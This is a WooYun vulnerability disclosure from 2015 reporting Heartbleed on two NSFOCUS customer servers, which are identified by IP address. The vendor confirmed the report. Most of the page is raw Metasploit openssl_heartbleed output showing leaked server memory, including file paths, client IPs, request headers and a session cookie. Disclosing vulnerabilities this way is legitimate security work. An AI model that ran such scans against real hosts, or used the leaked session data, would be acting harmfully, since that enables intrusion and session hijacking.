当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116688

漏洞标题:绿盟科技某客户两处心脏滴血

相关厂商:绿盟科技

漏洞作者: 路人甲

提交时间:2015-05-28 15:12

修复时间:2015-07-13 18:40

公开时间:2015-07-13 18:40

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-28: 细节已通知厂商并且等待厂商处理中
2015-05-29: 厂商已经确认,细节仅向厂商公开
2015-06-08: 细节向核心白帽子及相关领域专家公开
2015-06-18: 细节向普通白帽子公开
2015-06-28: 细节向实习白帽子公开
2015-07-13: 细节向公众公开

简要描述:

*

详细说明:

https://125.76.230.45/user/login
https://125.76.230.44/user/login
125.76.230.44

[*] 125.76.230.44:443 - Printable info leaked: UezT-g[~Rzf"!98532ED/A_42# @@eDa4A:vx&c)1/Y3O~i}F1s<rII@0~Y6O16rh'x""-|pGYk*S$]q)6%v-zLB*84+:Q-98M`t=C#m430922073827Z010UCN10UBEIJING10UBEIJING10UNSFOCUS Ltd10UNSFOCUS10UNSFOCUS1"0 *Hsupport@nsfocus.com00*H0`{pI0>uW9VR_Q%`M4oE[f$}cXRq@@Y`g/()0*HL-{ML#H9t9iX@B+ai=}:-QX6"ip/XTueTixcyHh%nOTRk]F<##Z-Y,0wgB#?F9lJ?P=9GRec4n'%TH.[Q}<6}e`PYYoNYz$.h6dl7H#(wuNmW@&?o -w9MQ\74tC[J@5k'dw-|e4E4N]R2}?_&]w2vOqZX]G))Sq3b%[4J^vSW4fLzShgnF(OfbU65ddVp4Q{O1eLm=-.fHLIpvHD9Nmf5}9YpPBbvPrx3VT H&#vY>7\R)IRiDtGHWcI~^03uZ61Xz9Pr@IqmX3<n`%/9[R)UO3\p{l`CgKg)C@|yngEtrn,Np43a1B[j5<g=hlMQAy:x|"IH()KA6d$5)Y4Lkye%fmnXLeWrh"vXb^vv@gdq7N5mN\ea\35T3c4)}%lJI0%Q,%+Q9:xn ?33Sc<bU{e5geF yi_^CStV n!@p@p_6L`Zo)UjN-=g-E*qVa<:YKp5KjW!V>*vC&jz'g((o"XU{E]e_OtXi6(>-3(U"})+B!z2g~_94w>/|f}$,4h"5i`W`AH:!#?6/uD\Sf6}PX~l2~G4Ehj~G/p>1;@-ucGh%en7@?3~l%E+bHp-=I03]</p5))*"ug[UtImWtq5makXLt }?u%O2zxdQC0;<3/|? )WK iK;|L7TJ(S'&{bDrKzmGpMehRsHCbvh."\Pwi 1y26Ed2PP^b*7zSir$r=>(da;tmTedY3z~SSd}~#q2@'Ytzm~h3\) cy(=7hw/AkBi[yd-DSz%E+f]X5CN%lyF(jS>Hw%6/))a3Hlg8iSR4r0 Z]MI8r>&4g&9  wd=<>F.b!n~Qub:W??FK202&ZHCRO"o>\kryq-fkEz1xQ21^Ka1nzw`dkgm~-0 <PUN,]Mtlv#ERY)C]&_0\TPp9!Ems{wf&-DQF#,QoJdH..4N(sT7VtWJ6;Fj}Ww_Y^nP+flPC~%[?U1uu9bdse,?.(TG9C}Q8;'mHOd}DyMEjJAE!'-!U<+y15o!@*g@F4"%M`PSEJ6,Veco!/yj7]S>{FX<_.^jzJyAu+Fki|M|7R98*@-s#m>A0^`s$ja{'UGf_5eV^rnqrGhwS*.zkGU,!MdhkEiE4xLy"7S,d?1LRBwLAD#~!UuPCDd0h~f%Vk%*OYp+$HGs_.%H \$ZM[6#GGD[HXhEn+2/oo|JW<CI(%&{^A-UxRd@XSc_i_aW -m{7E]J&wS;5@1cA%Mog5XHJ%47>fa>:G?2j1$bM=0)7 X[DVn?xf{-ij9{K50 p:YUx67>=H;fRP;^R)9xzT@&#X!h`(%8yv9zt1l;a$Eeco)$$l\TOB@gb4AH]tY?0uDeQL`qY[{af7 hMMGhFK=* p\!idB|hF9QPXvC2{3'<@ToS`Jy+k+*%@7FZWEqX5hd4$\0IpjqBL;|=7B*fbhm`vgpBw<>;)$vcF$<LA)-l{QT?VJi)I;LK@k&;AhoDzf&0g[})4)-84^`FnIR\X)Iq Ed-0}3*@(I?Jc5>i5E&wmf;)=^,pY (`g5CA#nl^klGvF7]<>!7aTI23P7n3o:gHJ]sCvSj3&\&|'ZD#\:jsOPYF$={9go(JhktS4<BiNnys3qMQl~XfQzRe@eWNe/vD+1ss(rd1D[<BIOM4~&ipo#eSY;olf-:g2p|=!?BRzfG%v4~L\bdU5Y`=!;{dntE.N;]oA-\RJ(_+-I9tKmv1:7!EjT#~#]hs.d1HtX@L8SH,S{$f2PXEBzroP'h*S#0#/pu-CCx[vi`.-usC=|4,_5~MJJ'r8RxKhd[`?,Tj~i\k+vZCLU][LJHroz[+249RVJ'23"X$.1tPfXj$g]K'm{>Bvq:oA(#UZt>X^O\_Fct^bi_NWPm\5{OWJ}#iXr4_:jl4RqGTO2%1{:H W:|@{F <<CX:30t,XOEgXK!z"sP>>jgdq!UjE*K_*33dm]d;f7\kY4f{ain5VfrOv0cHufP<}]=\J1tb4M:$^'UQ|}1Ov@8l<=TXv:uEyJPe97y^zT>8#82M1d674=_d6w9>Sn6&K62uW<;${ GX:?AH7)_j<n@l-/7_HsP/I9` i3e;}C,./A(w0iQpIo"6eOo.gN7wR1;S+A7Ajng<0}S*xuT[#_Ib{t#t]|c<8fbj~2]!u5T7Cd="nqm_h^}yw|OE9xR(VZCD|H<'dCdv($Z'(c0jF=IrXT"^a:sb8l;)c=AgeY9 ^8uT<e]nG1zOsGKw[I!/z~+d{jjp$n9;wAGy4]fZUrNp_D'L-?!/$a. dvsf\b&e918aSg=<?FLG)4F1g2)0Th{'tpC5Nz%@\y.sz0A8O]d~^$-c0ASLtH`o,XubaN$=e<(-DjUqcA^Um'p_"R(YcRX.Da) 2A|}a?n)^q&E}5>U'T&]}.gda[8<eR-N{p"gT{).`fTKDIhq$[G]6fn}9a[7#{:{o=8UGn]3w/\@sv1NS.^\dc*DfDnQ/Q+,Z/N^A.R)/t?t>sa3>>R41CrtWNM'`Uo58G;}DJvry~qWvNTv!(4A. E<L>SveSUa[p`F:a)G-&ix<fZrQ2etIW%w9|PTY`lPnUq)Ef8<j(}O~*_ZhFN=bH&y,]PcFQb~Plw^'cPjOzUAXVQg3X9Jcwp-aJgOse]`$P+JPXvzsE#C_0k3@[.[bJOcbw4=(r}5)VH=GV.~T="UJE?L/\9$4\CJ3'fCz@dJapq\y`WVQjiVD4v0aZ_:PJ,?1wR/+`5gwvjKZokQzRvT<Q>xm9>|+R]nQ#yJg@PnlPLFqIwuuu)tu,;N<%zogl8-hAzbJ?"B`i3"`n0r:5=w8k}@Cb_ R^G$!<tt^5c]Y"D!<W scvI>&{hJJ?}1TbC!P;@Y0`;0@ L060@8P8zL0yLBeoHL0P88x8}Lxx8H88h8`@|888808h888SlY%X8888c8p0p8x08x8h8x888x8psUUn@~@~@8p|LL8x88x888060X8timeout=15, max=996088888:3^BThu, 28 May 2015 00:29:41 GMT60888TSOH8:3^B8XD88cqYcqYcqL8cqp8cq8cqYcq113.139.15.10uafU[28/May/2015:08:29:41 +0800]uafUGET /favicon.ico HTTP/1.1304113.139.15.10 - - [28/May/2015:08:29:41 +0800] "GET /favicon.ico HTTP/1.1" 304 -8y8y08x88(YyuafU[28/201529:41 +0800]uafU113.139.15.10TLSv1.2ECDHE-RSA-AES256-SHA384ECDHE-RSS256384GET /favicon.ico HTTP/1.1W8QINU)X8IRCS)X8IRCSMay/EXEXPTTH 113.139.15.10 TLSv1.2 ECDHE-RSA-AES256-SHA384 "GET /favicon.ico HTTP/1.1" -x88qHx90TSALDI90GATE#I#IECCAkH:0TNOCt I:0PEEK It INNOCAI WTNOCx8X8x88 H<WxONPV)X8_DOMEXEXLSSP8`8RID88M0.X(88h80x808088(8:3^Bm8x8}LkHM08x8}Lm8x8}Lm M0Lx8}Lx8888H88$]BGET / HTTP/1.1 HTTP/1.1GET/avicon/co/aviconHTTP/1.1faviconHost 125.76.230.44Cache-Control max-age=0Connection Keep-Alive125.76.230.44x}mM0S8x8}LVWaDf38AAAEAAFt7r8cAAABTx8https://125.76.230.44//8886:20 GMTUser-Agent Mozilla/5.0 (Windows; U; MSI/6.0; WREQUEST_METHODSGET.NETGET 2.000727)/usr/local/nsfocus/web/apache2/www//usr/local/nsfocus/web/apache2/www/8X$y$yp08x88pphx0800/8/usr/local/nsfocus/web/apache2/www/8x8xmsH*hx<q/usr/local/nsfocus/web/apache2/www//usr/local/nsfocus/web/apache2/www/.htaccessx/usr/local/nsfocus/web/apache2/www/.htaccesslocx88x0mmm/usr/local/nsfocus/web/apache2/www/.htaccess8+80cavy_filter.php/usr/local/nsfocus/web/apache2/www/cavy_filter.php/cavy_filter.phpredirect:/cavy_filter.phpindex.html,index.html.var,index.php,index.phtmldir-index-namesindex.html,index.html.var,index.php,index.phtml(Gt88}LFt88}LGt888}L]r88}Lrh88}L/cavy_filter.phpx8}Lx8H88h8`@|I.80888008:0>0M000A0A0C060x0L0x88x80x8psDiekek@~A0p|LL08! 88,AM cEO?YX~|^azk(swJ\/kGm_dJ_2@l(UFw"fK73k#o~DA#]S\Eld)3hLhOf%DK}x(cfIU9|##130929073827Z430922073827Z010UCN10UBEIJING10UBEIJING10UNSFOCUS Ltd10UNSFOCUS10UNSFOCUS1"0 *Hsupport@nsfocus.com00*H0`{pI0>uW9VR_Q%`M4oE[f$}cXRq@@Y`g/()0*HL-{ML#H9t9iX@B+ai=}:-QX6"ip/XTueA)>Ol*u>R;eQc]}mR4}}\EH,k-lBZ{:Dk;^F6:o}NcI[uapa.k2yqZiJ#IgMiJ}_;{_ynQI4a@^u,yP
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(openssl_heartbleed) >


125.76.230.45

[*] 125.76.230.45:443 - Printable info leaked: Ue<GDKRKB;f"!98532ED/AUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0Referer: https://125.76.230.45/user/loginAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=eea86784cc15de0e879c6ebe1acfb81cKv`bp@@ @taptpptpBeoHapapbpbpHwHepeplpnpipppp@7xrptpSptpSppXepbpxepbpfpbp0jpbpmpbpopbpqphspspspbpspsppsp:eBm(tpbpkPtpbpmxtpbpmbpbptptpptp:eB pI! pp,{q}|!p:}l<8Tkc[O1aNamU6~WtA{QD4cSA/NI6D=gMj7Kd;XzYgiF1$jVF>$3|/I]J1P(.|.EG<1y0Hv_4/N%130614150924Z430607150924Z010UCN10UBeijing10UBeijing10UNSFOCUS Ltd10UNSFOCUS10UNSFOCUS1"0 *Hsupport@nsfocus.com0"0*H0Q{yY`WGyJ?^|mHWpBd_c)Rxw!U:g;o_5iI7[Ouki:1-K(&B9w t<0-=;Wa0'^a5%;q)]%Ya51*MK-iWuAk(_sSU7y^T\9$$DKl=t\;=t)/Iz0.1g?ktcNTI@,Qw;GAERXJ%&%N>Kwg4'H<*RMM\4:G#'3",f-)M:yRdoye*IT%m!m-@l:W'`A[}\;k>*0*Hn`^tC[9 82Co:Z s::!g8,==bR:H|aSMjIR*,n^F{3&2y.1C79x'X9Sws.E]x$TR"Rq9UK+W"'FqO-R$GXFxle6w han>jd+*ljOCo^G9hC7*pyfnrQucf3z;)F8CY$xgqP%es5[p\J%XEYnq1Cw{{~d<zegPu#@>-x5*" JF9L/(]]&N1<$pw(w/HfUh=An*;Yb-MIAw34jk2,K#y<Lb8E9DGII*DW7yka6^0??#el@,Bt?L@`xoC$th{mz&(EZ*I61*:gQh2Y\+%bs$)kanz6mVWk*WYZrF3QZ,_.EV5Tj_7aTml6*]pZTG\RY3=iU*7E"Tf,"3*){.((X+sJ!D,A(u{GaxLgDszw<N2/;Z03~"^|_98D$[*tpt`]p%+PBS005iuAsa7~=BY![SMOv H#i\BGM $hJh~@  t pEp%Ppxp5p_u%bw+syU7v_5`p\J%!]%q5p%@pjfx&~qp@pp4(pp pppttt uxutpttPtttHtXtt`tt$(pE p0pE@p2p@pqpppd0p p@p5p5pp5`p5p0x.! 4H05p5p%p5 pE-p5p_u%bw+syU7v_0%ppepup5Ppep p@ ppqp`ppdp p@`ppP5p\J%!]%quV5p|S1p5p3w%pjfx&~5p5p5p0x.! 4H0up~}5ppTcB5p?A,Wi%p5pO7%pp5@pPepUppPp pp!pp  papp`$pxp%0pxp5p5p5p{zQ&-QkfO5p\9D]<5@p%@pxp%pxp5p5pEp5`pPp'L&L&UPp pp xpp$p(p0p%p%ppxpp5pa`\%%Ay?NL5p05pF: z){Z@S:I'Z50pu&{XH%pp 5p907854f219a1244f826a750c ~tcp8pp`ppRewritHTTP/1.1 200 OKDate: Thu, 28 May 2015 03:08:16 GMTServer: NSFOCUSLast-Modified: Mon, 08 Jul 2013 13:02:00 GMTETag: "3a-4e0ffa668a200"Accept-Ranges: bytesContent-Length: 58Keep-Alive: timeout=15, max=96Connection: Keep-AliveContent-Type: image/gif+x{P[P8W>"QttPyh%z3w<"*SFycYx#IiOH.8K3mkPr5~ _Di6DM':^g9UA`R$Q_]e1?4i9l46M&+_gLx4X_fUkBsAv 9S=gw=L;6{d0G .y<k>CT)Y2ew2uYD:!NM84-xx-q@C5Xc]*k.v9&f1&e0bmp|4Xk4*A3s@|XiN`/oB\:L"[LV17Y&x VXV*e-eC?1k/bj>kZo%MD+$Jn7j%~EzhvCj".JX}v=< :)q11a3UF,_TX$&G(sXx-6x/Ti*W;?e&NyM1V[-J8@63\dStu*hA{f]x!F*;|k;BSUR(77elILPSIQ6K#u3'0G'FJ&V\_#oyf"y\y`!@rh\gbSd^X+mm<8A+y4_Xwu p%abtru7<Z}Ij2_pMeQlVx47X-X[B![{c2ji4xZ9:XdhB<ZHMC~)T,!t8Cwy`~8V?h#&89or\C8/}}&#}<;RiShKFv},y-%aS[e#Iq;KxPBkjg#%xNxBl^YC@94C`t7@-|OK_O]7#00w_Oewb%NAh;J[rX FO!:'2w2 5#qv5~!n`@h`U?rL|q|NA{LmtoB!7!$%PAPqpsOzN5S/cuwJ%ct,:bO{~9z$5ySv|7!7F>;-fuKXbxG#xa4q_W8s{H#'>wrq7HUQ$#(1|'OS.?0Pa uOjhuucYE&$.Or&S/"RG.'oH|g{f!Wb*jd:=g_J5rFD"TL|/W!"X.'9{kSM=!Q6'+0}is[4[aW.s=}56~h~}.29ad"k%k-DPKW9ay<$m(PAi3z<OEDYu*4f!+;aZ{0gHgj{W?\Fk)Q#_8LK>]z@TigdGZ%hOaQ(^Gg'l%,lM(%UG1tRmUIXzlTCsvPg6vOALXfKCFDSzN5P-D1;7op4HBe.9u4gnPpO`$ih3!C&U0#;mm`3o]-?}'Wr@D@4(H^ujK(\|!b&#/z3Z/ewHpKf8$F=815JI2w?.1<N~G_)\w2d%(%tQYJ!w!fA,^s-\eQ:?qf?^k)^$[E:pzX\\^+)OA!7-589l^AkgG+O57jP*yc|XMHeS`xO+RJSF ]vd:N{TL%`{]xI n1!O>}8{{qlUe3x1CHN|U7z1X1\ss|5kHT#VIdA'#4$ewuh]I{C?Bp"Tfd#;k=puMdv^-e\B}k3JEWmS_?2uIh0B/V~dLb\lQx'>m.S3RU00SD%rtRr" :,g2Iw87(1O19SAL7\|PA`E\1O9X@.j,K- Lb<hr=d.x'2mGM~9C0.c`/hj81|4-z70E$g|: OPh5!(HEPN1^u;jukn|x0Ya14)g20[@x+F[N`c5_ PGujGdh/Qz+@,lc*',kN3/_B4?1;M_$0zA~U0eRNO!4iX&hNMba''('un3l,>*ft-n0@%wgaW*NtW(U1TB/0^"<q.c+8Qe#MZQiq=uv~t\ome57Em`M!<ZzJ}A\HHjOnI"F5}w)zb|;Op|(w_ N[c`Epz`.O|L*;+!KnqAs|NM,[\<.ssMKJsq/8SvAwTf]y"\d6s=Wtlu5+@i,s7{cUYtH2^i45OI1?q^LVm[,F#zAE9<rZUM2.T}$X#3@ke`>7^AU!:HAn9r?7COnZxW/RXy(B6,6BTxh|uQLHyt"vRK}qTw0tPTw+5FQ$9'|pN1o/DtQ/>7 t6g*h1+PJgF<A7i96xAx04@B4">NXHe'}svY#Am'"/bb]}H4SR"e^dZkYA|Dn[].~P{luv]V:XXWy/v*?W=nf'=\<<EyUVJC\iT/M3i@b7{::``'36 ;qwD?ygMSY~n_'e2Du]4DxadI5/AhB=&+5$yXC8v-TOHOfhdVRUYr{wHXJp/$oUfVyK.A&>Qaa+ Qh)H;1Q^lZy8F v2t~0n|^_5Ev0p|xR("G]I90^FMk*/$KFe*S4NUE+W]&&unGi8>2jd2IB1cEtf>\IQ4[/i#\)m1itva$>a@X!tVmovvx0|V(\*<8Muk!T]vL<(02}1#s%jjo]FIX9oL]fA-r$du8!4/+zM)2t$L;vdn/@:JaGf=PS5)gB`f_A@N["([55>A$8xbv5s.ba2P^>$'-*QrPN`{<o%txSh,R. :zoO%EJR<VMwgmhZ>*Xpb..N3(s%mJda"s&""Qr,<`KF'vw(kKgB cOf6'k0[9pJY'o#6W|cpoP1iRhAbVB$Yc9;o#44!FO4Stg%2RJ!>^e1\_ ?`4jNNl1`0HIhaZ^b)rAWj<{tgC0LMeLW-cTeK#&DPTQA+qS$gBW>c$)DJ2Wvg4gA`$R2UaxTl[r&U%y?2A:h>hGs=oJV}KI<bFHe-`%HLuvyR;=g80G,cvrStk+@29!$i3gvUWULs1zGMaO>,V7Nrewriterule!\.(js|ico|gif|jpg|png|bmp|css|php|php?.*|htm|html|eml|txt|htc|cab)$cavy_filter.phptppBBdp0@ppp~ppp/usr/local/nsfocus/web/apache2/www/phq9xqHrrp4rrr(drfrqrPurHyrrrrPr+sP0s_sps}s:xtpww msH9x*hwww pxpHphp9xHpHppdp(puserdpppuserppQpp1xpxpDUpe pepemIw5 puieKK5p;YQq,%Hf$B%Pp%p
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(openssl_heartbleed) >

漏洞证明:

RT

修复方案:

*

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-29 18:38

厂商回复:

非常感谢您告知此问题,我们正在紧急联系受影响客户安装相关升级包

最新状态:

暂无


漏洞评价:

评论